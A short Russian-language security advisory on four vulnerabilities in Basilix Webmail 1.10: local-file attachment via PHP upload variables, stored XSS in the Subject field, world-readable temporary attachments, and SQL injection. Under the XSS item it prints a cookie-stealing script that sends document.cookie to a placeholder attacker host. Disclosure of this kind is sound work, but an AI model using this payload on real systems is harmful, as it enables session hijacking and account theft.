Basilix Webmail System — простая система webmail, написанная на PHP. 

1. Можно прикрепить любой файл на webmail хосте к почтовому сообщению. При загрузки файла, PHP устанавливает некоторые глобальные переменные, одна из которых дает временное местоположение
загруженного файла. BasiliX не проверяет, было ли вложение действительно загружено пользователем. Пользователь может
переопределить переменную так, что бы она
указывала на известный локальный файл — в
результате файл отошлется вместе с
сообщением. 

2. При просмотре почтового сообщения не фильтруются тэги в поле Subject. Нападающий может включать произвольный javascript код в Subject, который будет выполнен в браузере пользователя при просмотре уязвимого сообщения. Уязвимость может использоваться для перехвата куки:

<script>self.location.href=" http://evilhost.com/evil?"+escape(document.cookie)
</script>

3. Прикрепленный файл записывается в /tmp/BasiliX и может быть прочитан любым пользователем. 

4. Данные от пользователя пропускаются к SQL
серверу без фильтрации, тем самым можно изменить существующий SQL запрос. Уязвимость позволяет получить чувствительную информацию из базы данных или модифицировать существующие данные.

Уязвимость обнаружена в Basilix Webmail 1.10.

Оставить мнение